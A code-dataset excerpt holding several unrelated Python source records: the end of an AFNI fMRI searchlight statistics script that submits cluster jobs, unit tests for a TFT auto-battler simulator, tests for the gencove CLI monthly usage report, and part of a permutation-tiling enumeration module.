{script}\")\n \n jobfile = f'/home1/05426/ach3377/gPPI/jobs/{name}_sl_ers_job.txt'\n os.system(f'rm {jobfile}')\n\n #not run here, just submiting a job\n os.system(f'echo singularity run --cleanenv \\\n /scratch/05426/ach3377/bids-apps/neurosft.simg \\\n bash -x {script} >> {jobfile}')\n\n os.system(f'launch -N 1 \\\n -n 1 \\\n -J 3dttest++ \\\n -s {jobfile} \\\n -m achennings@utexas.edu \\\n -p normal \\\n -r 0:05:00 \\\n -A LewPea_MRI_Analysis')\none_samp_ttest(subs=sub_args,phase='acquisition',name='healthy')\none_samp_ttest(subs=sub_args,phase='extinction',name='healthy')\none_samp_ttest(subs=p_sub_args,phase='acquisition',name='ptsd')\none_samp_ttest(subs=p_sub_args,phase='extinction',name='ptsd')\n\ndef paired_ttest(subs=None,name=''):\n out_parent = '/scratch/05426/ach3377/searchlight/ers_comps'\n out_dir = f'/scratch/05426/ach3377/searchlight/ers_comps/{name}'\n mkdir(out_dir)\n \n setA = ''\n setB = ''\n for s, sub in enumerate(subs):\n subj = bids_meta(sub)\n setA += f'{subj.rsa}/ers_sl_imgs/extinction_diff.nii.gz '\n setB += f'{subj.rsa}/ers_sl_imgs/acquisition_diff.nii.gz '\n\n n_cors = 'export OMP_NUM_THREADS=48'\n cd_cmd = f'cd {out_dir}'\n clustsim_cmd = f'3dttest++ -setA {setA} \\\n -setB {setB} \\\n -AminusB \\\n -paired \\\n -Clustsim 48 \\\n -mask {gm_3mm_thr} \\\n -prefix {name}_clst-ttest'\n \n script = f'{out_dir}/ttest_script.txt'\n os.system(f'rm {script}')\n \n for cmd in [n_cors, cd_cmd, clustsim_cmd]:\n os.system(f\"echo {cmd} >> {script}\")\n \n #run it\n os.system(f'singularity run --cleanenv \\\n /scratch/05426/ach3377/bids-apps/neurosft.simg \\\n bash -x {script}')\npaired_ttest(subs=sub_args,name='healthy_phase_diff')\npaired_ttest(subs=p_sub_args,name='ptsd_phase_diff')\n\ndef ind_ttest(phase=None,name=''):\n out_parent = '/scratch/05426/ach3377/searchlight/ers_comps'\n out_dir = f'/scratch/05426/ach3377/searchlight/ers_comps/{name}'\n mkdir(out_dir)\n \n setA = ''\n setB = ''\n for sub in sub_args:\n subj = bids_meta(sub)\n setA += f'{subj.rsa}/ers_sl_imgs/{phase}_diff.nii.gz '\n \n for sub in p_sub_args:\n subj = bids_meta(sub)\n setB += f'{subj.rsa}/ers_sl_imgs/{phase}_diff.nii.gz '\n \n n_cors = 'export OMP_NUM_THREADS=48'\n cd_cmd = f'cd {out_dir}'\n clustsim_cmd = f'3dttest++ -setA {setA} \\\n -setB {setB} \\\n -AminusB \\\n -Clustsim 48 \\\n -mask {gm_3mm_thr} \\\n -prefix {name}_clst-ttest'\n \n script = f'{out_dir}/ttest_script.txt'\n os.system(f'rm {script}')\n \n for cmd in [n_cors, cd_cmd, clustsim_cmd]:\n os.system(f\"echo {cmd} >> {script}\")\n \n #run it\n os.system(f'singularity run --cleanenv \\\n /scratch/05426/ach3377/bids-apps/neurosft.simg \\\n bash -x {script}')\nind_ttest(phase='acquisition',name='acq_group_diff')\nind_ttest(phase='extinction',name='ext_group_diff')\n\ndef ers_cluster(contrast=None,thr=0,nvox=0,mask='../../standard/gm_3mm_thr.nii.gz',tail=None):\n here = os.getcwd()\n folder = contrast\n name = contrast.split('/')[-1]\n os.chdir(folder)\n \n if tail == 'one-sided':\n side = '1sided RIGHT_TAIL'\n elif tail == 'two-sided':\n side = '2sided'\n\n cmap = f'{name}_ClusterMap.nii.gz';os.system(f'rm {cmap}')\n ceff = f'{name}_ClusterEffEst.nii.gz';os.system(f'rm {ceff}')\n\n ctxt = f'{name}_cluster.txt';os.system(f'rm {ctxt}')\n where = f'{name}_where.txt';os.system(f'rm {where}')\n \n cmd = f\"3dClusterize -inset {name}_clst-ttest+orig \\\n -ithr 1 \\\n -idat 0 \\\n -mask {mask} \\\n -NN 3 \\\n -{side} p={thr} \\\n -clust_nvox {nvox} \\\n -pref_map {cmap} \\\n -pref_dat {ceff} > {ctxt}\"\n\n \n os.system(cmd)\n \n if os.path.exists(f'{name}_ClusterMap.nii.gz'):\n w_cmd = f\"whereami -coord_file {ctxt}'[13,14,15]' > {where}\"\n os.system(w_cmd)\n \n\n os.chdir(here)\n\ners_cluster(contrast=f'{HOME}/Desktop/ers_comps/healthy_acquisition',thr=0.001,nvox=20,tail='one-sided')#20\ners_cluster(contrast=f'{HOME}/Desktop/ers_comps/healthy_extinction',thr=0.001,nvox=20,tail='one-sided')#20\ners_cluster(contrast=f'{HOME}/Desktop/ers_comps/ptsd_acquisition',thr=0.001,nvox=20,tail='one-sided')#20\ners_cluster(contrast=f'{HOME}/Desktop/ers_comps/ptsd_extinction',thr=0.001,nvox=21,tail='one-sided')#21\n\ners_cluster(contrast=f'{HOME}/Desktop/ers_comps/healthy_phase_diff',thr=0.001,nvox=16,tail='two-sided')\ners_cluster(contrast=f'{HOME}/Desktop/ers_comps/ptsd_phase_diff',thr=0.001,nvox=18,tail='two-sided')\ners_cluster(contrast=f'{HOME}/Desktop/ers_comps/acq_group_diff',thr=0.001,nvox=21,tail='two-sided')\ners_cluster(contrast=f'{HOME}/Desktop/ers_comps/ext_group_diff',thr=0.001,nvox=20,tail='two-sided')\n\n# 3dClusterize -inset healthy_CSpE__CSpA_clst-ttest+tlrc -ithr 1 -idat 0 -mask /scratch/05426/ach3377/standard/gm_1mm_thr.nii.gz -NN 2 -2sided p=0.01 -clust_nvox 498 -pref_map healthy_CSpE__CSpA_ClusterMap.nii.gz -pref_dat healthy_CSpE__CSpA_ClusterEffEst.nii.gz > healthy_CSpE__CSpA_cluster.txt\n","repo_name":"dunsmoorlab/gPPI","sub_path":"afni_sl_stats.py","file_name":"afni_sl_stats.py","file_ext":"py","file_size_in_byte":8617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"343678477","text":"from Simulator.player import Player\nfrom Simulator.pool import pool\nfrom Simulator.champion import champion\nfrom Simulator import champion as c_object\nfrom Simulator.item_stats import trait_items, starting_items\nfrom Simulator.origin_class_stats import origin_class\n\n\ndef setup(player_num=0) -> Player:\n \"\"\"Creates fresh player and pool\"\"\"\n base_pool = pool()\n player1 = Player(base_pool, player_num)\n return player1\n\n\ndef azir_test():\n p1 = setup()\n p1.gold = 1000\n p1.max_units = 4\n p1.buy_champion(champion('azir'))\n p1.move_bench_to_board(0, 0, 0)\n coords = p1.board[0][0].sandguard_overlord_coordinates\n assert p1.board[coords[0][0]][coords[0][1]].name == 'sandguard'\n assert p1.board[coords[1][0]][coords[1][1]].name == 'sandguard'\n p1.move_board_to_board(1, 1, 5, 3)\n assert [5, 3] in p1.board[0][0].sandguard_overlord_coordinates\n p1.move_board_to_bench(0, 0)\n for x in range(7):\n for y in range(4):\n assert p1.board[x][y] is None\n\n p1.buy_champion(champion('azir'))\n p1.move_bench_to_board(0, 0, 0)\n coords = p1.board[0][0].sandguard_overlord_coordinates\n assert p1.board[coords[0][0]][coords[0][1]].name == 'sandguard'\n assert p1.board[coords[1][0]][coords[1][1]].name == 'sandguard'\n assert p1.num_units_in_play == 1\n p1.sell_champion(p1.board[0][0])\n for x in range(7):\n for y in range(4):\n assert p1.board[x][y] is None\n\n\ndef chosen_test():\n p1 = setup()\n p1.gold = 1000\n p1.max_units = 4\n p1.buy_champion(champion('leesin', chosen='duelist'))\n assert p1.chosen == 'duelist'\n p1.move_bench_to_board(0, 0, 0)\n assert p1.team_tiers['duelist'] == 1\n p2 = setup()\n p2.gold = 1000\n p2.max_units = 4\n p1.buy_champion(champion('leesin'))\n p1.buy_champion(champion('leesin'))\n assert p1.board[0][0].chosen == 'duelist'\n\ndef end_of_turn_actions_test():\n p1 = setup()\n p1.gold = 1000\n p1.max_units = 3\n for _ in range(8):\n p1.buy_champion(champion('leesin'))\n p1.move_bench_to_board(0, 0, 0)\n p1.buy_champion(champion('nami'))\n p1.move_bench_to_board(0, 1, 0)\n p1.add_to_item_bench('duelists_zeal')\n p1.move_item(0, 1, 0)\n p1.end_turn_actions()\n assert p1.bench[1] is None\n assert p1.bench[2] is not None\n assert p1.team_tiers['duelist'] == 1\n\ndef championDuplicatorTest():\n p1 = setup()\n p1.gold = 1000\n p1. max_units = 10\n p1.buy_champion(champion('leesin'))\n for x in range(4):\n p1.add_to_item_bench('champion_duplicator')\n p1.move_item(0, 0, -1)\n assert p1.item_bench[0] is None\n assert p1.bench[1].name == 'leesin'\n p1.move_bench_to_board(0, 0, 0)\n p1.move_item(1, 0, 0)\n print(p1.bench)\n assert p1.board[0][0].stars == 2\n assert p1.gold == 995\n p1.buy_champion(champion('jax'))\n p1.move_bench_to_board(0, 1, 0)\n p1.move_item(2, 1, 0)\n assert p1.bench[0].name == 'jax'\n p1.buy_champion(champion('nami'))\n p1.buy_champion(champion('aphelios'))\n p1.buy_champion(champion('vayne'))\n p1.buy_champion(champion('vi'))\n p1.buy_champion(champion('warwick'))\n p1.buy_champion(champion('teemo'))\n p1.buy_champion(champion('thresh'))\n p1.buy_champion(champion('talon'))\n p1.move_item(3, 3, -1)\n assert p1.item_bench[3] == 'champion_duplicator'\n for x in range(8):\n p1.sell_from_bench(x)\n assert p1.bench[x] is None\n\ndef magneticRemoverTest():\n p1 = setup()\n p1.gold = 1000\n p1.max_units = 10\n p1.buy_champion(champion('leesin'))\n p1.buy_champion(champion('jax'))\n p1.move_bench_to_board(0, 0, 0)\n p1.add_to_item_bench('magnetic_remover')\n p1.add_to_item_bench('magnetic_remover')\n p1.add_to_item_bench('mages_cap')\n for x in range(5):\n p1.add_to_item_bench('deathblade')\n for x in range(2, 5):\n p1.move_item(x, 0, 0)\n for x in range(5, 8):\n p1.move_item(x, 1, -1)\n assert p1.team_composition['mage'] != 0\n p1.move_item(0, 0, 0)\n p1.move_item(1, 1, -1)\n assert p1.team_composition['mage'] == 0\n assert p1.board[0][0].items == []\n assert p1.bench[1].items == []\n\ndef reforgerTest():\n p1 = setup()\n p1.gold = 1000\n p1.max_units = 10\n for x in range(3):\n p1.add_to_item_bench('reforger')\n p1.buy_champion(champion('leesin'))\n p1.buy_champion(champion('jax'))\n p1.buy_champion(champion('nami'))\n p1.add_to_item_bench('sunfire_cape')\n p1.add_to_item_bench('redemption')\n p1.add_to_item_bench('bf_sword')\n p1.add_to_item_bench('spatula')\n p1.add_to_item_bench('elderwood_heirloom')\n p1.add_to_item_bench('thieves_gloves')\n p1.move_bench_to_board(0, 0, 0)\n p1.move_item(3, 0, 0)\n p1.move_item(4, 0, 0)\n p1.move_item(5, 0, 0)\n p1.move_item(0, 0, 0)\n assert len(p1.board[0][0].items) == 0\n assert p1.item_bench[0] is None\n p1.move_item(6, 1, -1)\n p1.move_item(7, 1, -1)\n p1.move_item(8, 2, -1)\n p1.move_item(1, 1, -1)\n p1.move_item(2, 2, -1)\n test1 = False\n test2 = False\n test3 = False\n test4 = False\n for x in range(9):\n if p1.item_bench[x] == 'reforger':\n test1 = True\n if p1.item_bench[x] == 'spatula':\n test2 = True\n if p1.item_bench[x] in list(trait_items.values()):\n test3 = True\n if p1.item_bench[x] in starting_items:\n test4 = True\n assert not test1\n assert test2\n assert test3\n assert test4\n\ndef thiefsGloveCombatTest():\n p1 = setup()\n p1.gold = 1000\n p1.max_units = 1\n p2 = setup()\n p2.gold = 1000\n p2.max_units = 1\n p1.buy_champion(champion('nami'))\n p2.buy_champion(champion('nami'))\n p1.add_to_item_bench('thieves_gloves')\n p2.add_to_item_bench('thieves_gloves')\n p1.move_bench_to_board(0, 0, 0)\n p2.move_bench_to_board(0, 0, 0)\n p1.move_item(0, 0, 0)\n p2.move_item(0, 0, 0)\n p1.add_to_item_bench('deathblade')\n p1.move_item(0, 0, 0)\n assert p1.item_bench[0] == 'deathblade'\n c_object.run(c_object.champion, p1, p2)\n assert p1.board[0][0].items[0] == 'thieves_gloves'\n\ndef thiefsGlovesTest():\n p1 = setup()\n p1.gold = 1000\n p1.max_units = 1\n p1.buy_champion(champion('azir'))\n p1.buy_champion(champion('garen'))\n p1.add_to_item_bench('thieves_gloves')\n p1.move_bench_to_board(0, 0, 0)\n p1.move_item(0, 0, 0)\n assert p1.board[0][0].items[0] == 'thieves_gloves'\n for x in range(3):\n p1.start_round(x)\n p1.move_board_to_board(0, 0, 6, 3)\n p1.start_round(3)\n p1.move_board_to_bench(6, 3)\n p1.start_round(4)\n p1.sell_from_bench(0)\n p1.buy_champion(champion('azir'))\n p1.move_item(0, 0, -1)\n p1.start_round(5)\n\ndef kaynTests():\n p1 = setup()\n p2 = setup(1)\n p1.gold = 500\n p2.gold = 500\n p1.max_units = 10\n p2.max_units = 10\n p1.buy_champion(champion('kayn'))\n p1.move_bench_to_board(0, 0, 0)\n for x in range(3):\n p1.start_round(x)\n p2.start_round(x)\n p2.buy_champion(champion('kayn'))\n p2.move_bench_to_board(0, x, 0)\n assert p1.kayn_transformed, 'Kayn should transform after his third round in combat'\n assert not p2.kayn_transformed\n assert p1.item_bench[0] == 'kayn_shadowassassin'\n assert p1.item_bench[1] == 'kayn_rhast'\n p2.start_round(3)\n assert p2.kayn_transformed\n p1.move_item(0, 0, 0)\n assert p2.item_bench[0] == 'kayn_shadowassassin'\n assert p2.item_bench[1] == 'kayn_rhast'\n for x in range(7):\n for y in range(4):\n if p2.board[x][y]:\n p2.move_item(1, x, y)\n break\n assert p1.kayn_form == 'kayn_shadowassassin'\n assert p2.kayn_form == 'kayn_rhast'\n p1.buy_champion(champion('kayn'))\n assert p1.bench[0].kayn_form == 'kayn_shadowassassin'\n for x in range(10):\n assert not p1.item_bench[x]\n\ndef level2Champion():\n \"\"\"Creates 3 Zileans, there should be 1 2* Zilean on bench\"\"\"\n p1 = setup()\n p1.gold = 100000\n p1.max_units = 10\n for x in range(3):\n p1.buy_champion(champion(\"zilean\"))\n assert p1.bench[0].stars == 2, \"champion should be 2*\"\n for x in range(1, 9):\n assert p1.bench[x] is None, \"these slot should be empty\"\n for x in p1.board:\n for y in x:\n assert y is None, \"the board should be empty\"\n\n\ndef level3Champion():\n \"\"\"Creates 9 Zileans, there should be 1 3* Zilean on bench\"\"\"\n p1 = setup()\n p1.gold = 100000\n p1.max_units = 1000\n for x in range(3):\n p1.buy_champion(champion(\"zilean\"))\n assert p1.bench[0].stars == 2\n for x in range(3):\n p1.buy_champion(champion(\"zilean\"))\n assert p1.bench[1].stars == 2\n for x in range(3):\n p1.buy_champion(champion(\"zilean\"))\n assert p1.bench[0].stars == 3, \"champion should be 3*\"\n for x in range(1, 9):\n assert p1.bench[x] is None, \"this slot should be empty\"\n for x in p1.board:\n for y in x:\n assert y is None, \"the board should be empty\"\n\n\ndef levelChampFromField():\n \"\"\"buy third copy while 1 copy on field\"\"\"\n p1 = setup()\n p1.gold = 100000\n p1.max_units = 1000\n p1.buy_champion(champion(\"zilean\"))\n p1.buy_champion(champion(\"zilean\"))\n p1.move_bench_to_board(1, 0, 0)\n p1.buy_champion(champion(\"zilean\"))\n for x in p1.bench:\n assert x is None, \"bench should be empty\"\n assert p1.board[0][0].stars == 2, \"the unit placed on the field should be 2*\"\n\n\n# Please expand on this test or add additional tests here.\n# I am sure there are some bugs with the level cutoffs for example\n# Like I do not think I am hitting level 3 on the correct round without buying any exp\ndef buyExp():\n p1 = setup()\n p1.level_up()\n lvl = p1.level\n while p1.level < p1.max_level:\n p1.exp = p1.level_costs[p1.level + 1]\n p1.level_up()\n lvl += 1\n assert lvl == p1.level\n\n\ndef spamExp():\n \"\"\"buys tons of experience\"\"\"\n p1 = setup()\n p1.gold = 100000\n for _ in range(1000):\n p1.buy_exp()\n assert p1.level == p1.max_level, \"I should be max level\"\n assert p1.exp == 0, \"I should not have been able to buy experience after hitting max lvl\"\n\n\ndef incomeTest1():\n \"\"\"first test for gold income\"\"\"\n p1 = setup()\n p1.gold = 15\n p1.gold_income(5)\n assert p1.gold == 21, f\"Interest calculation is messy, gold should be 21, it is {p1.gold}\"\n\n\ndef incomeTest2():\n \"\"\"Check for income cap\"\"\"\n p1 = setup()\n p1.gold = 1000\n p1.gold_income(5)\n assert p1.gold == 1010, f\"Interest calculation is messy, gold should be 1010, it is {p1.gold}\"\n\n\ndef incomeTest3():\n \"\"\"Checks win streak gold\"\"\"\n p1 = setup()\n p1.gold = 0\n p1.win_streak = 0\n p1.gold_income(5)\n assert p1.gold == 5, f\"Interest calculation is messy, gold should be 5, it is {p1.gold}\"\n p1.gold = 0\n p1.win_streak = 1\n p1.gold_income(5)\n assert p1.gold == 5, f\"Interest calculation is messy, gold should be 5, it is {p1.gold}\"\n p1.gold = 0\n p1.win_streak = 2\n p1.gold_income(5)\n assert p1.gold == 6, f\"Interest calculation is messy, gold should be 6, it is {p1.gold}\"\n p1.gold = 0\n p1.win_streak = 3\n p1.gold_income(5)\n assert p1.gold == 6, f\"Interest calculation is messy, gold should be 6, it is {p1.gold}\"\n p1.gold = 0\n p1.win_streak = 4\n p1.gold_income(5)\n assert p1.gold == 7, f\"Interest calculation is messy, gold should be 7, it is {p1.gold}\"\n p1.gold = 0\n p1.win_streak = 5\n p1.gold_income(5)\n assert p1.gold == 8, f\"Interest calculation is messy, gold should be 8, it is {p1.gold}\"\n p1.gold = 0\n p1.win_streak = 500\n p1.gold_income(5)\n assert p1.gold == 8, f\"Interest calculation is messy, gold should be 8, it is {p1.gold}\"\n\n\ndef incomeTest4():\n \"\"\"Checks loss streak gold\"\"\"\n p1 = setup()\n p1.gold = 0\n p1.loss_streak = 0\n p1.gold_income(5)\n assert p1.gold == 5, f\"Interest calculation is messy, gold should be 5, it is {p1.gold}\"\n p1.gold = 0\n p1.loss_streak = 1\n p1.gold_income(5)\n assert p1.gold == 5, f\"Interest calculation is messy, gold should be 5, it is {p1.gold}\"\n p1.gold = 0\n p1.loss_streak = 2\n p1.gold_income(5)\n assert p1.gold == 6, f\"Interest calculation is messy, gold should be 6, it is {p1.gold}\"\n p1.gold = 0\n p1.loss_streak = 3\n p1.gold_income(5)\n assert p1.gold == 6, f\"Interest calculation is messy, gold should be 6, it is {p1.gold}\"\n p1.gold = 0\n p1.loss_streak = 4\n p1.gold_income(5)\n assert p1.gold == 7, f\"Interest calculation is messy, gold should be 7, it is {p1.gold}\"\n p1.gold = 0\n p1.loss_streak = 5\n p1.gold_income(5)\n assert p1.gold == 8, f\"Interest calculation is messy, gold should be 8, it is {p1.gold}\"\n p1.gold = 0\n p1.loss_streak = 500\n p1.gold_income(5)\n assert p1.gold == 8, f\"Interest calculation is messy, gold should be 8, it is {p1.gold}\"\n\n\ndef test_list():\n \"\"\"tests all test cases\"\"\"\n azir_test()\n chosen_test()\n end_of_turn_actions_test()\n\n championDuplicatorTest()\n magneticRemoverTest()\n reforgerTest()\n\n thiefsGloveCombatTest()\n thiefsGlovesTest()\n\n kaynTests()\n\n level2Champion()\n level3Champion()\n levelChampFromField()\n\n buyExp()\n # spamExp()\n\n # Problem: Interest gets calculated after base income is added\n incomeTest1()\n # Problem: Interest rate not capped\n incomeTest2()\n incomeTest3()\n incomeTest4()\n\n # I would like to go over move commands again before writing test code for that\n pass\n","repo_name":"silverlight6/TFTMuZeroAgent","sub_path":"UnitTests/player_test.py","file_name":"player_test.py","file_ext":"py","file_size_in_byte":13482,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"53"} +{"seq_id":"14961130302","text":"\"\"\"Test reports monthly-usage command.\"\"\"\n\n# pylint: disable=wrong-import-order, import-error\nimport operator\nimport os\n\nfrom click.testing import CliRunner\n\nfrom gencove.client import APIClient, APIClientError # noqa: I100\nfrom gencove.command.reports.cli import monthly_usage\nfrom gencove.tests.decorators import assert_authorization\nfrom gencove.tests.filters import (\n filter_aws_headers,\n filter_jwt,\n replace_gencove_url_vcr,\n)\nfrom gencove.tests.reports.vcr.filters import (\n filter_monthly_usage_report_request,\n filter_report_response_body,\n filter_report_response_filename,\n)\nfrom gencove.tests.upload.vcr.filters import filter_volatile_dates\nfrom gencove.tests.utils import get_response_from_vcr_dict, get_vcr_response\n\nimport pytest\n\nfrom vcr import VCR\n\n\n@pytest.fixture(scope=\"module\")\ndef vcr_config():\n \"\"\"VCR configuration.\"\"\"\n return {\n \"cassette_library_dir\": \"gencove/tests/reports/vcr\",\n \"filter_headers\": [\"Authorization\", \"Content-Length\", \"User-Agent\", \"ETag\"],\n \"filter_post_data_parameters\": [\n (\"email\", \"email@example.com\"),\n (\"password\", \"mock_password\"),\n ],\n \"match_on\": [\"method\", \"scheme\", \"port\", \"path\", \"query\"],\n \"path_transformer\": VCR.ensure_suffix(\".yaml\"),\n \"before_record_request\": [\n replace_gencove_url_vcr,\n filter_monthly_usage_report_request,\n ],\n \"before_record_response\": [\n filter_jwt,\n filter_aws_headers,\n filter_volatile_dates,\n filter_report_response_body,\n filter_report_response_filename,\n ],\n }\n\n\n@pytest.mark.vcr\n@assert_authorization\ndef test_monthly_usage__success( # pylint: disable=too-many-arguments,unused-argument\n credentials, mocker, recording, vcr\n):\n \"\"\"Test monthly usage report success case\"\"\"\n runner = CliRunner()\n if not recording:\n monthly_usage_dict = get_vcr_response(\n \"/api/v2/organization-monthly-usage-report/\",\n vcr,\n operator.contains,\n just_body=False,\n )\n response = get_response_from_vcr_dict(monthly_usage_dict)\n\n # Need to reconstruct the raw response\n mocked_monthly_usage = mocker.patch.object(\n APIClient,\n \"get_organization_monthly_usage_report\",\n return_value=response,\n )\n with runner.isolated_filesystem():\n os.mkdir(\"tempdir\")\n res = runner.invoke(\n monthly_usage,\n [\n *credentials,\n ],\n )\n\n assert res.exit_code == 0\n if not recording:\n mocked_monthly_usage.assert_called_once()\n assert \"Saved organization monthly usage report CSV\" in res.output\n\n\n@pytest.mark.vcr\n@assert_authorization\ndef test_monthly_usage__success_dates(\n credentials, mocker, recording, vcr\n): # pylint: disable=too-many-arguments,too-many-locals,unused-argument\n \"\"\"Test monthly usage report success case with requested dates\"\"\"\n runner = CliRunner()\n if not recording:\n monthly_usage_dict = get_vcr_response(\n \"/api/v2/organization-monthly-usage-report/\",\n vcr,\n operator.contains,\n just_body=False,\n )\n response = get_response_from_vcr_dict(monthly_usage_dict)\n\n # Need to reconstruct the raw response\n mocked_monthly_usage = mocker.patch.object(\n APIClient,\n \"get_organization_monthly_usage_report\",\n return_value=response,\n )\n with runner.isolated_filesystem():\n os.mkdir(\"tempdir\")\n outfile = \"tempdir/test.csv\"\n res = runner.invoke(\n monthly_usage,\n [\n \"--output-filename\",\n f\"{outfile}\",\n \"--from\",\n \"2021-09\",\n \"--to\",\n \"2021-10\",\n *credentials,\n ],\n )\n\n with open(outfile, \"r\", encoding=\"utf-8\") as fileobj:\n contents = fileobj.readlines()\n\n assert res.exit_code == 0\n if not recording:\n mocked_monthly_usage.assert_called_once()\n assert \"Saved organization monthly usage report CSV\" in res.output\n\n # Confirm columns are as expected\n columns_row = contents[0]\n columns = columns_row.strip().split(\",\")\n assert \"year\" in columns\n assert \"month\" in columns\n assert \"succeeded_samples\" in columns\n assert \"failed_samples\" in columns\n\n # should be two months of data + headers\n assert len(contents) == 3\n\n\n@pytest.mark.vcr\n@assert_authorization\ndef test_monthly_usage__bad_date( # pylint: disable=too-many-arguments,unused-argument\n credentials, mocker, recording, vcr\n):\n \"\"\"Test monthly usage report with bad date value\"\"\"\n runner = CliRunner()\n if not recording:\n monthly_usage_dict = get_vcr_response(\n \"/api/v2/organization-monthly-usage-report/\",\n vcr,\n operator.contains,\n just_body=False,\n )\n response = get_response_from_vcr_dict(monthly_usage_dict)\n\n # Need to reconstruct the raw response\n mocked_monthly_usage = mocker.patch.object(\n APIClient,\n \"get_organization_monthly_usage_report\",\n side_effect=APIClientError(\n message=response.content,\n status_code=response.status_code,\n ),\n return_value=response,\n )\n\n with runner.isolated_filesystem():\n os.mkdir(\"tempdir\")\n # invoke without --to param\n res = runner.invoke(\n monthly_usage,\n [\n \"--from\",\n \"2023-01\",\n *credentials,\n ],\n )\n\n assert res.exit_code == 0\n if not recording:\n mocked_monthly_usage.assert_called_once()\n assert \"There was an error retrieving the monthly usage report\" in res.output\n assert (\n \"Must provide both 'from' and 'to' query parameters, or neither\" in res.output\n )\n","repo_name":"gncv/gencove-cli","sub_path":"gencove/tests/reports/test_reports_monthly_usage.py","file_name":"test_reports_monthly_usage.py","file_ext":"py","file_size_in_byte":6034,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"39012568249","text":"import abc\nfrom collections import deque\nfrom itertools import chain\nfrom typing import TYPE_CHECKING, Any, Dict, FrozenSet, Iterable, Optional\n\nimport requests\nfrom sympy import Expr, Symbol, diff, simplify, sympify, var\n\nfrom comb_spec_searcher.utils import taylor_expand\nfrom permuta import Av\nfrom permuta.permutils.symmetry import lex_min\nfrom tilings.exception import InvalidOperationError\nfrom tilings.griddedperm import GriddedPerm\nfrom tilings.misc import is_tree\n\nif TYPE_CHECKING:\n from tilings import Tiling\n\nx = Symbol(\"x\")\n\n\nclass Enumeration(abc.ABC):\n \"\"\"\n General representation of a strategy to enumerate tilings.\n \"\"\"\n\n def __init__(self, tiling: \"Tiling\"):\n self.tiling = tiling\n\n @abc.abstractmethod\n def verified(self) -> bool:\n \"\"\"\n Returns True if enumeration strategy works for the tiling.\n \"\"\"\n raise NotImplementedError\n\n def get_genf(self, **kwargs) -> Expr:\n \"\"\"\n Returns the generating function for the tiling.\n\n Raises an InvalidOperationError if the tiling is not verified.\n \"\"\"\n if not self.verified():\n raise InvalidOperationError(\"The tiling is not verified\")\n raise NotImplementedError\n\n def __repr__(self) -> str:\n return \"Enumeration for:\\n\" + str(self.tiling)\n\n\nclass LocalEnumeration(Enumeration):\n \"\"\"\n Enumeration strategy for a locally enumerable tiling.\n\n A tiling is locally enumerable if the tiling has no crossing obstructions\n or requirements.\n\n There's not universal way of describing a tiling that is locally enumerable\n with a specification.\n \"\"\"\n\n def __init__(self, tiling, no_req=False):\n super().__init__(tiling)\n self.no_req = no_req\n\n def verified(self) -> bool:\n if self.no_req and self.tiling.requirements:\n return False\n return (\n all(gp.is_single_cell() for gp in self.tiling.obstructions)\n and all(self._req_is_single_cell(req) for req in self.tiling.requirements)\n and all(\n gp.is_single_cell()\n for gp in chain.from_iterable(\n ass.gps for ass in self.tiling.assumptions\n )\n )\n )\n\n @staticmethod\n def _req_is_single_cell(req: Iterable[GriddedPerm]) -> bool:\n \"\"\"\n Returns True if all the gridded perm in the iterable are single cell and in\n the same cell.\n \"\"\"\n req_iter = iter(req)\n gp0 = next(req_iter)\n if not gp0.is_single_cell():\n return False\n cell = gp0.pos[0]\n all_cells = chain.from_iterable(gp.pos for gp in req_iter)\n return all(c == cell for c in all_cells)\n\n def get_genf(self, **kwargs) -> Any:\n # pylint: disable=too-many-return-statements\n if not self.verified():\n raise InvalidOperationError(\"The tiling is not verified\")\n\n funcs: Optional[Dict[\"Tiling\", Any]] = kwargs.get(\"funcs\")\n if funcs is None:\n funcs = {}\n if self.tiling.requirements:\n reqs = self.tiling.requirements[0]\n avoided = self.tiling.__class__(\n self.tiling.obstructions + reqs,\n self.tiling.requirements[1:],\n self.tiling.assumptions,\n )\n without = self.tiling.__class__(\n self.tiling.obstructions,\n self.tiling.requirements[1:],\n self.tiling.assumptions,\n )\n avgf = LocalEnumeration(avoided).get_genf(funcs=funcs)\n wogf = LocalEnumeration(without).get_genf(funcs=funcs)\n return wogf - avgf\n if self.tiling in funcs:\n return funcs[self.tiling]\n # also return something entirely different if the root class/not verified\n if self.tiling.dimensions == (1, 1):\n if self.tiling.is_epsilon():\n return 1\n if self.tiling == self.tiling.__class__.from_string(\"01_10\"):\n return 1 + x\n basis = [ob.patt for ob in self.tiling.obstructions]\n basis_str = \"_\".join(map(str, lex_min(basis)))\n uri = f\"https://permpal.com/perms/raw_data_json/basis/{basis_str}\"\n request = requests.get(uri, timeout=10)\n if request.status_code == 404:\n raise NotImplementedError(f\"No entry on permpal for {Av(basis)}\")\n data = request.json()\n if data[\"generating_function_sympy\"] is None:\n raise NotImplementedError(\n f\"No explicit generating function on permpal for {Av(basis)}\"\n )\n return sympify(data[\"generating_function_sympy\"])\n gf = None\n if MonotoneTreeEnumeration(self.tiling).verified():\n gf = MonotoneTreeEnumeration(self.tiling).get_genf()\n if DatabaseEnumeration(self.tiling).verified():\n gf = DatabaseEnumeration(self.tiling).get_genf()\n if gf is not None:\n funcs[self.tiling] = gf\n return gf\n # TODO: should this create a spec as in the strategy?\n raise NotImplementedError(\n f\"Not sure how to enumerate the tiling:\\n{self.tiling}\"\n )\n\n\nclass MonotoneTreeEnumeration(Enumeration):\n \"\"\"\n Enumeration strategy for a monotone tree tiling.\n\n A tiling is a monotone tree if it is local, its cell graph is a tree and\n all but possibly one cell are monotone.\n\n A monotone tree tiling can be described by a tree where the verified object\n are the cells of the tiling.\n \"\"\"\n\n _tracking_var = var(\"t\")\n\n def verified(self):\n no_req_list = all(len(rl) == 1 for rl in self.tiling.requirements)\n num_non_monotone = sum(\n 1 for c in self.tiling.active_cells if not self.tiling.is_monotone_cell(c)\n )\n return (\n self.tiling.dimensions != (1, 1)\n and LocalEnumeration(self.tiling).verified()\n and no_req_list\n and num_non_monotone <= 1\n and is_tree(self.tiling.active_cells, self.tiling.cell_graph())\n )\n\n def _cell_tree_traversal(self, start):\n \"\"\"\n Traverse the tree by starting at `start` and always visiting an entire\n row or column before going somewhere else.\n\n The start vertices is not yielded.\n \"\"\"\n queue = deque(\n chain(\n self.tiling.cells_in_col(start[0]), self.tiling.cells_in_row(start[1])\n )\n )\n visited = set([start])\n while queue:\n cell = queue.popleft()\n if cell not in visited:\n yield cell\n visited.add(cell)\n 